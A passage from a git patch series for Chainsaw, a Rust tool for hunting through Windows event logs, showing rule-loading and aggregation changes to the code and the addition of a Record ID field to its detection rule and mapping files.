Some(sd) = self.inner.from { - if localised <= sd { - continue; - } - } - // Check if event is newer than end date marker - if let Some(ed) = self.inner.to { - if localised >= ed { - continue; - } } } - if let Some(tags) = match &document { - Doc::Evtx(evtx) => evtx.hits(&self.inner.rules, &mapping.exclusions, group), - } { - for tag in tags { - hits.push(Hit { - tag, - group: group.name.clone(), - mapping: Some(mapping.name.clone()), - timestamp, - }); + HuntKind::Rule { aggregate, filter } => { + let hit = match &filter { + Filter::Detection(detection) => tau_engine::solve(&detection, &mapper), + Filter::Expression(expression) => { + tau_engine::core::solve(&expression, &mapper) + } + }; + if hit { + if let Some(aggregate) = aggregate { + files.insert(document_id.clone(), (document.clone(), timestamp)); + let mut hasher = DefaultHasher::new(); + for field in &aggregate.fields { + if let Some(value) = + mapper.find(&field).and_then(|s| s.to_string()) + { + value.hash(&mut hasher); + } + } + let id = hasher.finish(); + let aggregates = aggregates + .entry(hunt.id) + .or_insert((&aggregate, HashMap::new())); + let docs = aggregates.1.entry(id).or_insert(vec![]); + docs.push(document_id.clone()); + } else { + hits.push(Hit { + hunt: hunt.id.clone(), + rule: hunt.id.clone(), + timestamp, + }); + } } } } - - if hits.is_empty() { - continue; - } + } + if !hits.is_empty() { let data = match &document { - Doc::Evtx(evtx) => evtx.data.clone(), + File::Evtx(evtx) => evtx.data.clone(), }; detections.push(Detections { hits, kind: Kind::Individual { document: Document { - kind: "evtx".to_owned(), + kind: kind.clone(), data, }, }, }); } } + for (id, (aggregate, docs)) in aggregates { + for ids in docs.values() { + let hit = match aggregate.count { + Pattern::Equal(i) => (i as usize) == ids.len(), + Pattern::GreaterThan(i) => (i as usize) > ids.len(), + Pattern::GreaterThanOrEqual(i) => (i as usize) >= ids.len(), + Pattern::LessThan(i) => (i as usize) < ids.len(), + Pattern::LessThanOrEqual(i) => (i as usize) <= ids.len(), + _ => false, + }; + if hit { + let mut documents = Vec::with_capacity(ids.len()); + let mut timestamps = Vec::with_capacity(ids.len()); + for id in ids { + let (document, timestamp) = files.get(&id).expect("could not get document"); + let data = match &document { + File::Evtx(evtx) => evtx.data.clone(), + }; + documents.push(Document { + kind: kind.clone(), + data, + }); + timestamps.push(timestamp.clone()); + } + timestamps.sort(); + detections.push(Detections { + hits: vec![Hit { + hunt: id.clone(), + rule: id.clone(), + timestamp: timestamps + .into_iter() + .next() + .expect("failed to get timestamp"), + }], + kind: Kind::Aggregate { documents }, + }); + } + } + } Ok(detections) } + pub fn hunts(&self) -> &Vec { + &self.inner.hunts + } + pub fn mappings(&self) -> &Vec { &self.inner.mappings } - pub fn rules(&self) -> &Vec { + pub fn rules(&self) -> &HashMap> { &self.inner.rules } + + fn skip(&self, timestamp: NaiveDateTime) -> crate::Result { + if self.inner.from.is_some() || self.inner.to.is_some() { + // TODO: Not sure if this is correct... + let localised = if let Some(timezone) = self.inner.timezone { + let local = match timezone.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.inner.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + return Ok(true); + } else { + anyhow::bail!("failed to localise timestamp"); + } + } + }; + local.with_timezone(&Utc) + } else if self.inner.local { + match Utc.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.inner.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + return Ok(true); + } else { + anyhow::bail!("failed to localise timestamp"); + } + } + } + } else { + DateTime::::from_utc(timestamp, Utc) + }; + // Check if event is older than start date marker + if let Some(sd) = self.inner.from { + if localised <= sd { + return Ok(true); + } + } + // Check if event is newer than end date marker + if let Some(ed) = self.inner.to { + if localised >= ed { + return Ok(true); + } + } + } + Ok(false) + } } diff --git a/src/lib.rs b/src/lib.rs index 98bd7901..41187182 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -4,7 +4,7 @@ extern crate anyhow; pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; -pub use hunt::{Detection, Hunter, HunterBuilder}; +pub use hunt::{Hunter, HunterBuilder}; pub use rule::{lint_rule, load_rule, sigma, Kind as RuleKind}; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/main.rs b/src/main.rs index b5c9d59a..2334972a 100644 --- a/src/main.rs +++ b/src/main.rs @@ -99,7 +99,7 @@ enum Command { /// Search through event logs for specific event IDs and/or keywords Search { /// A pattern to search for. - #[structopt(required_unless = "regexp")] + #[structopt(required_unless_one=&["regexp", "tau"])] pattern: Option, /// The paths to search through. @@ -137,7 +137,7 @@ enum Command { #[structopt(long = "skip-errors")] skip_errors: bool, /// Tau expressions to search with. - #[structopt(short = "t", long = "tau")] + #[structopt(short = "t", long = "tau", number_of_values = 1)] tau: Option>, /// The field that contains the timestamp. #[structopt(long = "timestamp", requires_if("from", "to"))] @@ -242,7 +242,7 @@ fn run() -> Result<()> { let mut rs = vec![]; for path in &rules { for file in get_files(path, &None, skip_errors)? { - match load_rule(&RuleKind::Sigma, &file) { + match load_rule(&file) { Ok(mut r) => { count += 1; rs.append(&mut r) @@ -292,12 +292,20 @@ fn run() -> Result<()> { } pb.finish(); if csv { - cli::print_csv(&detections, hunter.mappings(), local, timezone)?; + cli::print_csv( + &detections, + hunter.hunts(), + hunter.mappings(), + hunter.rules(), + local, + timezone, + )?; } else if json { cli::print_json(&detections, hunter.rules(), local, timezone)?; } else { cli::print_detections( &detections, + hunter.hunts(), hunter.mappings(), hunter.rules(), column_width.unwrap_or(40), @@ -338,7 +346,7 @@ fn run() -> Result<()> { Command::Search { path, - pattern, + mut pattern, regexp, extension, @@ -359,9 +367,9 @@ fn run() -> Result<()> { if !opts.no_banner { print_title(); } - let mut paths = if regexp.is_some() { + let mut paths = if regexp.is_some() || tau.is_some() { let mut scratch = pattern - .as_ref() + .take() .map(|p| vec![PathBuf::from(p)]) .unwrap_or_default(); scratch.extend(path); diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index dddcca9e..37843cb8 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -1,15 +1,201 @@ -use serde::Deserialize; -use tau_engine::Rule as Tau; +use std::fmt; +use std::fs::File; +use std::io::Read; +use std::path::Path; + +use serde::{ + de::{self, MapAccess, Visitor}, + Deserialize, Serialize, +}; +use tau_engine::core::{ + parser::{Expression, Pattern}, + Detection, +}; + +use crate::file::Kind; + +#[derive(Clone, Debug, Deserialize)] +pub struct Aggregate { + #[serde(deserialize_with = "crate::ext::tau::deserialize_numeric")] + pub count: Pattern, + pub fields: Vec, +} + +#[derive(Clone, Debug, Deserialize)] +pub struct Container { + pub name: String, + pub format: Format, +} + +#[derive(Clone, Debug)] +pub struct Field { + pub name: String, + pub from: String, + pub to: String, + + pub container: Option, + pub visible: bool, +} + +impl<'de> Deserialize<'de> for Field { + fn deserialize(deserializer: D) -> Result + where + D: de::Deserializer<'de>, + { + struct FieldVisitor; + + impl<'de> Visitor<'de> for FieldVisitor { + type Value = Field; + + fn expecting(&self, formatter: &mut fmt::Formatter) -> fmt::Result { + formatter.write_str("struct Field") + } + + fn visit_map(self, mut map: V) -> Result + where + V: MapAccess<'de>, + { + let mut container = None; + let mut from = None; + let mut name = None; + let mut to = None; + let mut visible = None; + while let Some(key) = map.next_key::()? { + match key.as_str() { + "name" => { + if name.is_some() { + return Err(de::Error::duplicate_field("name")); + } + name = Some(map.next_value()?); + } + "from" => { + if from.is_some() { + return Err(de::Error::duplicate_field("from")); + } + from = Some(map.next_value()?); + } + "to" => { + if to.is_some() { + return Err(de::Error::duplicate_field("to")); + } + to = Some(map.next_value()?); + } + "container" => { + if container.is_some() { + return Err(de::Error::duplicate_field("container")); + } + container = Some(map.next_value()?); + } + "visible" => { + if visible.is_some() { + return Err(de::Error::duplicate_field("visible")); + } + visible = Some(map.next_value()?); + } + _ => return Err(de::Error::unknown_field(&key, FIELDS)), + } + } + if name.is_none() && to.is_none() { + return Err(de::Error::missing_field("to")); + } + let to: String = to.ok_or_else(|| de::Error::missing_field("to"))?; + let name = name.unwrap_or_else(|| to.clone()); + let from = from.unwrap_or_else(|| to.clone()); + let container = container.unwrap_or_default(); + let visible = visible.unwrap_or_else(|| true); + Ok(Field { + name, + to, + from, + container, + visible, + }) + } + } + + const FIELDS: &'static [&'static str] = &["container", "from", "name", "to", "visible"]; + deserializer.deserialize_struct("Field", FIELDS, FieldVisitor) + } +} + +#[derive(Clone, Debug, Deserialize)] +#[serde(untagged)] +pub enum Filter { + Detection(Detection), + #[serde(deserialize_with = "crate::ext::tau::deserialize_expression")] + Expression(Expression), +} + +#[derive(Clone, Debug, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum Format { + Json, +} + +#[derive(Clone, Debug, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Level { + Critical, + High, + Medium, + Low, + Info, +} + +impl fmt::Display for Level { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Critical => write!(f, "critical"), + Self::High => write!(f, "high"), + Self::Medium => write!(f, "medium"), + Self::Low => write!(f, "low"), + Self::Info => write!(f, "info"), + } + } +} + +#[derive(Clone, Debug, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Status { + Stable, + Testing, +} + +impl fmt::Display for Status { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Stable => write!(f, "stable"), + Self::Testing => write!(f, "testing"), + } + } +} #[derive(Clone, Debug, Deserialize)] -#[serde(rename_all = "lowercase")] pub struct Rule { - pub level: String, #[serde(alias = "title")] - pub tag: String, - #[serde(flatten)] - pub tau: Tau, - + pub name: String, + pub group: String, + pub description: String, pub authors: Vec, - pub status: String, + + pub kind: Kind, + pub level: Level, + pub status: Status, + pub timestamp: String, + + pub fields: Vec, + + pub filter: Filter, + + #[serde(default)] + pub aggregate: Option, +} + +pub fn load(rule: &Path) -> crate::Result { + let mut file = File::open(rule)?; + let mut contents = String::new(); + file.read_to_string(&mut contents)?; + + let rule: Rule = serde_yaml::from_str(&contents)?; + Ok(rule) } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index b243bcbb..dce67157 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,15 +1,19 @@ use std::path::PathBuf; use std::str::FromStr; -use serde::Deserialize; +use serde::{Deserialize, Serialize}; -pub use self::chainsaw::Rule; +use crate::file::Kind as FileKind; + +pub use self::chainsaw::Rule as Chainsaw; +pub use self::sigma::Rule as Sigma; +pub use self::stalker::Rule as Stalker; pub mod chainsaw; pub mod sigma; pub mod stalker; -#[derive(Debug, Deserialize)] +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] #[serde(rename_all = "snake_case")] pub enum Kind { Chainsaw, @@ -37,27 +41,96 @@ impl FromStr for Kind { } } -pub fn load_rule(kind: &Kind, path: &PathBuf) -> crate::Result> { +#[derive(Debug)] +pub struct Rule { + pub chainsaw: Chainsaw, + pub kind: Kind, +} + +pub fn load_rule(path: &PathBuf) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); } } - let rules = match kind { - Kind::Chainsaw => { - unimplemented!() - } - Kind::Sigma => match sigma::load(&path) { - Ok(rules) => rules - .into_iter() - .filter_map(|r| serde_yaml::from_value(r).ok()) - .collect(), - Err(e) => anyhow::bail!(e), - }, - Kind::Stalker => match stalker::load(&path) { - Ok(rule) => vec![rule], - Err(e) => anyhow::bail!(e), - }, + // This is a bit crude but we try all formats then report the errors... + let rules = if let Ok(rule) = chainsaw::load(&path) { + vec![Rule { + chainsaw: rule, + kind: Kind::Chainsaw, + }] + } else if let Ok(rules) = sigma::load(&path) { + rules + .into_iter() + .filter_map(|r| serde_yaml::from_value(r).ok()) + .map(|rule: Sigma| Rule { + chainsaw: Chainsaw { + name: rule.name, + group: "".to_owned(), + description: rule.description, + authors: rule.authors, + // NOTE: A fake value as this is not used for non chainsaw rules + kind: FileKind::Evtx, + level: rule + .level + .map(|l| match l.as_str() { + "critical" => chainsaw::Level::Critical, + "high" => chainsaw::Level::High, + "medium" => chainsaw::Level::Medium, + "low" => chainsaw::Level::Low, + _ => chainsaw::Level::Info, + }) + .unwrap_or_else(|| chainsaw::Level::Info), + status: rule + .status + .map(|s| match s.as_str() { + "stable" => chainsaw::Status::Stable, + _ => chainsaw::Status::Testing, + }) + .unwrap_or_else(|| chainsaw::Status::Testing), + timestamp: "".to_owned(), + + fields: vec![], + + filter: chainsaw::Filter::Detection(rule.tau.detection), + + aggregate: None, + }, + kind: Kind::Sigma, + }) + .collect() + } else if let Ok(rule) = stalker::load(&path) { + vec![Rule { + chainsaw: Chainsaw { + name: rule.tag, + group: "".to_owned(), + description: rule.description, + authors: rule.authors, + // NOTE: A fake value as this is not used for non chainsaw rules + kind: FileKind::Evtx, + level: match rule.level.as_str() { + "critical" => chainsaw::Level::Critical, + "high" => chainsaw::Level::High, + "medium" => chainsaw::Level::Medium, + "low" => chainsaw::Level::Low, + _ => chainsaw::Level::Info, + }, + status: match rule.status.as_str() { + "stable" => chainsaw::Status::Stable, + _ => chainsaw::Status::Testing, + }, + timestamp: "".to_owned(), + + fields: vec![], + + filter: chainsaw::Filter::Detection(rule.tau.detection), + + aggregate: None, + }, + kind: Kind::Stalker, + }] + } else { + anyhow::bail!("failed to load rule, run the linter for more information"); }; Ok(rules) } diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index eec09e7c..478c5f3a 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -7,6 +7,21 @@ use anyhow::Result; use regex::Regex; use serde::Deserialize; use serde_yaml::{Mapping, Sequence, Value as Yaml}; +use tau_engine::Rule as Tau; + +#[derive(Clone, Debug, Deserialize)] +#[serde(rename_all = "lowercase")] +pub struct Rule { + #[serde(alias = "title")] + pub name: String, + #[serde(flatten)] + pub tau: Tau, + + pub authors: Vec, + pub description: String, + pub level: Option, + pub status: Option, +} #[derive(Clone, Debug, Deserialize, PartialEq)] struct Detection { diff --git a/src/rule/stalker.rs b/src/rule/stalker.rs index 7754aa00..729d0fee 100644 --- a/src/rule/stalker.rs +++ b/src/rule/stalker.rs @@ -5,27 +5,14 @@ use std::path::Path; use serde::Deserialize; use tau_engine::Rule as Tau; -use crate::rule::Rule; - -#[derive(Clone, Deserialize)] -pub struct Stalker { - tag: String, - tau: Tau, - level: String, - status: String, - authors: Vec, -} - -impl From for Rule { - fn from(stalker: Stalker) -> Self { - Self { - tag: stalker.tag, - level: stalker.level, - status: stalker.status, - tau: stalker.tau, - authors: stalker.authors, - } - } +#[derive(Clone, Debug, Deserialize)] +pub struct Rule { + pub tag: String, + pub tau: Tau, + pub description: String, + pub level: String, + pub status: String, + pub authors: Vec, } pub fn load(rule: &Path) -> crate::Result { @@ -33,6 +20,6 @@ pub fn load(rule: &Path) -> crate::Result { let mut contents = String::new(); file.read_to_string(&mut contents)?; - let stalker: Stalker = serde_yaml::from_str(&contents)?; - Ok(Rule::from(stalker)) + let rule: Rule = serde_yaml::from_str(&contents)?; + Ok(rule) } diff --git a/src/search.rs b/src/search.rs index 1a887f79..19a016f6 100644 --- a/src/search.rs +++ b/src/search.rs @@ -135,6 +135,9 @@ impl<'a> Iterator for Iter<'a> { if !tau_engine::core::solve(&expression, &crate::evtx::Wrapper(&r.data)) { continue; } + if self.searcher.regex.len() == 0 { + return Some(Ok(r.data)); + } } if r.matches(&self.searcher.regex) { return Some(Ok(r.data)); From af8d2c9be93aa5ef2c45de48fa92d8b61b1ade14 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 4 Jun 2022 20:19:04 +0100 Subject: [PATCH 07/77] feat: add in record id by default for evtx --- Cargo.lock | 2 +- Cargo.toml | 2 +- mappings/sigma-event-logs.yml | 27 +++++++++++++++++++ rules/account_tampering/new_user_created.yml | 2 ++ .../user_added_to_global_group.yml | 2 ++ .../user_added_to_local_group.yml | 2 ++ .../user_added_to_universal_group.yml | 2 ++ rules/antivirus/f-secure.yml | 2 ++ rules/antivirus/kaspersky.yml | 2 ++ rules/antivirus/sophos.yml | 2 ++ rules/antivirus/windows_defender.yml | 2 ++ rules/lateral_movement/batch_logon.yml | 2 ++ rules/lateral_movement/interactive_logon.yml | 2 ++ rules/lateral_movement/network_logon.yml | 2 ++ rules/lateral_movement/rdp_logon.yml | 2 ++ rules/lateral_movement/service_logon.yml | 2 ++ rules/lateral_movement/unlock_logon.yml | 2 ++ .../security_audit_log_was_cleared.yml | 2 ++ .../log_tampering/system_log_was_cleared.yml | 2 ++ rules/login_attacks/account_brute_force.yml | 2 ++ rules/service_tampering/event_log.yml | 2 ++ 21 files changed, 65 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index c39bbc6d..2bb4d423 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.1" +version = "2.0.0-alpha.2" dependencies = [ "aho-corasick 0.7.18", "anyhow", diff --git a/Cargo.toml b/Cargo.toml index e8d33b64..29a50672 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.1" +version = "2.0.0-alpha.2" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index 8d6d1c3d..c24a503a 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -23,6 +23,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer @@ -54,6 +57,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer @@ -95,6 +101,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer @@ -117,6 +126,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer @@ -139,6 +151,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer @@ -164,6 +179,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer @@ -187,6 +205,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer @@ -213,6 +234,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer @@ -232,6 +256,9 @@ groups: - name: Event ID from: EventID to: Event.System.EventID + - name: Record ID + from: EventRecordID + to: Event.System.EventRecordID - name: Computer from: Computer to: Event.System.Computer diff --git a/rules/account_tampering/new_user_created.yml b/rules/account_tampering/new_user_created.yml index b819c13d..3cd5844d 100644 --- a/rules/account_tampering/new_user_created.yml +++ b/rules/account_tampering/new_user_created.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/account_tampering/user_added_to_global_group.yml b/rules/account_tampering/user_added_to_global_group.yml index ab3c63cd..ef556794 100644 --- a/rules/account_tampering/user_added_to_global_group.yml +++ b/rules/account_tampering/user_added_to_global_group.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/account_tampering/user_added_to_local_group.yml b/rules/account_tampering/user_added_to_local_group.yml index e781bba3..8af797ea 100644 --- a/rules/account_tampering/user_added_to_local_group.yml +++ b/rules/account_tampering/user_added_to_local_group.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/account_tampering/user_added_to_universal_group.yml b/rules/account_tampering/user_added_to_universal_group.yml index 0d210df6..bed52b27 100644 --- a/rules/account_tampering/user_added_to_universal_group.yml +++ b/rules/account_tampering/user_added_to_universal_group.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml index 4eee3ec2..20fde701 100644 --- a/rules/antivirus/f-secure.yml +++ b/rules/antivirus/f-secure.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: Threat Name diff --git a/rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml index 4a56c7ce..e466e989 100644 --- a/rules/antivirus/kaspersky.yml +++ b/rules/antivirus/kaspersky.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: Threat Name diff --git a/rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml index 58fb3742..db54ef2a 100644 --- a/rules/antivirus/sophos.yml +++ b/rules/antivirus/sophos.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: Threat Type diff --git a/rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml index 5125b1b4..b5931982 100644 --- a/rules/antivirus/windows_defender.yml +++ b/rules/antivirus/windows_defender.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/lateral_movement/batch_logon.yml b/rules/lateral_movement/batch_logon.yml index fe0175eb..a22e15c3 100644 --- a/rules/lateral_movement/batch_logon.yml +++ b/rules/lateral_movement/batch_logon.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/lateral_movement/interactive_logon.yml b/rules/lateral_movement/interactive_logon.yml index b83dfab0..4f356a58 100644 --- a/rules/lateral_movement/interactive_logon.yml +++ b/rules/lateral_movement/interactive_logon.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/lateral_movement/network_logon.yml b/rules/lateral_movement/network_logon.yml index 51fbe425..2a0c84ff 100644 --- a/rules/lateral_movement/network_logon.yml +++ b/rules/lateral_movement/network_logon.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/lateral_movement/rdp_logon.yml b/rules/lateral_movement/rdp_logon.yml index ecdcfa6c..6b30d410 100644 --- a/rules/lateral_movement/rdp_logon.yml +++ b/rules/lateral_movement/rdp_logon.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/lateral_movement/service_logon.yml b/rules/lateral_movement/service_logon.yml index 3823b34c..3a445b98 100644 --- a/rules/lateral_movement/service_logon.yml +++ b/rules/lateral_movement/service_logon.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/lateral_movement/unlock_logon.yml b/rules/lateral_movement/unlock_logon.yml index 50b74080..74ab79a8 100644 --- a/rules/lateral_movement/unlock_logon.yml +++ b/rules/lateral_movement/unlock_logon.yml @@ -14,6 +14,8 @@ status: stable fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml index 9581ff8e..bd010f2f 100644 --- a/rules/log_tampering/security_audit_log_was_cleared.yml +++ b/rules/log_tampering/security_audit_log_was_cleared.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml index 6d52a275..a3a6ad6c 100644 --- a/rules/log_tampering/system_log_was_cleared.yml +++ b/rules/log_tampering/system_log_was_cleared.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: User diff --git a/rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml index 9935fe9e..0f1debec 100644 --- a/rules/login_attacks/account_brute_force.yml +++ b/rules/login_attacks/account_brute_force.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: User to: Event.EventData.TargetUserName diff --git a/rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml index c4da7a36..54c9414c 100644 --- a/rules/service_tampering/event_log.yml +++ b/rules/service_tampering/event_log.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: Service Name From a8724b91a0303a4f4d72cf6e63a70aad66dbfc94 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 4 Jun 2022 20:21:58 +0100 Subject: [PATCH 08/77] feat: don't add record id for brute force --- rules/login_attacks/account_brute_force.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml index 0f1debec..9935fe9e 100644 --- a/rules/login_attacks/account_brute_force.yml +++ b/rules/login_attacks/account_brute_force.yml @@ -15,8 +15,6 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - name: User to: Event.EventData.TargetUserName From 81c022e47b0931f5c2e5b5a6f8f93ac7306d67d3 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Mon, 6 Jun 2022 11:46:29 +0100 Subject: [PATCH 09/77] feat: wire in complex mapping extraction --- Cargo.lock | 1 + Cargo.toml | 1 + src/cli.rs | 72 ++++++--------- src/hunt.rs | 210 +++++++++++++++++++++++++------------------ src/main.rs | 10 +-- src/rule/chainsaw.rs | 2 +- 6 files changed, 154 insertions(+), 142 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 2bb4d423..0616c4fe 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -165,6 +165,7 @@ dependencies = [ "colour", "evtx", "indicatif", + "once_cell", "paste", "prettytable-rs", "rayon", diff --git a/Cargo.toml b/Cargo.toml index 29a50672..e0805f78 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -17,6 +17,7 @@ chrono-tz = { version = "0.4", features = ["serde"] } colour = "0.6" evtx = "0.7" indicatif = "0.16" +once_cell = "1.0" prettytable-rs = "0.8" rayon = "1.5" regex = "1.5" diff --git a/src/cli.rs b/src/cli.rs index e701bf2b..b88a09e2 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -10,7 +10,7 @@ use tau_engine::Document; use uuid::Uuid; use crate::file::Kind as FileKind; -use crate::hunt::{Detections, Group, Hunt, Kind, Mapper, Mapping}; +use crate::hunt::{Detections, Hunt, Kind}; use crate::rule::{ chainsaw::{Level, Rule as Chainsaw, Status}, Kind as RuleKind, @@ -79,7 +79,6 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String pub fn print_detections( detections: &[Detections], hunts: &[Hunt], - mappings: &[Mapping], rules: &HashMap>, column_width: u32, full: bool, @@ -111,20 +110,14 @@ pub fn print_detections( let headers = headers .entry(&hunt.group) .or_insert((vec![], HashSet::new())); - for header in &hunt.headers { - if !headers.1.contains(&header) { - (*headers).0.push(&header); - (*headers).1.insert(&header); + for field in hunt.mapper.fields() { + if field.visible && !headers.1.contains(&field.name) { + (*headers).0.push(&field.name); + (*headers).1.insert(&field.name); } } } // Build lookups - let mut groups: HashMap<&Uuid, &Group> = HashMap::new(); - for mapping in mappings { - for group in &mapping.groups { - groups.insert(&group.id, group); - } - } let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); @@ -236,20 +229,16 @@ pub fn print_detections( let mut hdrs = 